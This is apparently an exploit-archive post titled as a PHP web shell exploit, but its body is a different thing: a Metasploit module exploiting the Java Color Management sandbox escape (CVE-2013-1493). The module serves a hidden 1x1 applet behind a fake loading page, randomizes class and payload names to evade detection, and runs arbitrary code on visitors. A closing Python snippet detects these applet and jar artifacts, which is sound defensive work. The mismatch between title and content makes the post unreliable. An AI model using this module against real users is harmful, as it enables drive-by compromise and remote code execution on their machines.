STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'        => 'Java CMM Remote Code Execution',
      'Description' => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'  =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'    => [ 'win', 'java' ],
      'Payload'     => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'     =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Only the entry class name is randomized; the other three class names stay fixed.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the framework's payload entries inside the jar.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
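As an added defender-side example (not part of the forum post or of Metasploit): the module above serves a 1x1 applet whose archive is a random 8-letter .jar, and packs three fixed class names (Leak.class, MyBufferedImage.class, MyColorSpace.class) into that jar. The Python below checks an HTML body and a jar for both artifacts; the sample HTML and jar are constructed inline and the class bodies are placeholder bytes.

```python
"""Check served HTML and jars for the delivery pattern the module above produces.
Added example, not part of the forum post or of Metasploit; inputs are constructed."""
import io
import re
import zipfile

APPLET_RE = re.compile(r'<applet\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')

# Class names the module adds to the jar with fixed names (only Init is renamed).
KNOWN_CLASSES = {"Leak.class", "MyBufferedImage.class", "MyColorSpace.class"}


def suspicious_applets(html):
    """Return archive names of <applet> tags that are hidden (width/height <= 1)
    and point at a purely alphabetic 8-character .jar, as generate_html emits."""
    hits = []
    for m in APPLET_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        archive = attrs.get("archive", "")
        try:
            # A missing width/height is treated as 0 (hidden), like browsers do.
            tiny = int(attrs.get("width", "0")) <= 1 and int(attrs.get("height", "0")) <= 1
        except ValueError:
            tiny = False
        if tiny and re.fullmatch(r"[A-Za-z]{8}\.jar", archive):
            hits.append(archive)
    return hits


def known_exploit_classes(jar_bytes):
    """Return the set of jar entry names matching the module's helper classes."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return KNOWN_CLASSES & set(zf.namelist())


# Constructed sample HTML mirroring what generate_html returns.
SAMPLE_HTML = ('<html><head><title>Loading, Please Wait...</title></head>'
               '<body><center><p>Loading, Please Wait...</p></center>'
               '<applet archive="qWeRtYuI.jar" code="AbCd.class" width="1" height="1">'
               '</applet></body></html>')


def build_sample_jar():
    """Constructed jar with a renamed entry class plus two of the fixed helper names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("AbCd.class", "Leak.class", "MyColorSpace.class"):
            zf.writestr(name, b"\xca\xfe\xba\xbe placeholder")  # not real bytecode
    return buf.getvalue()
```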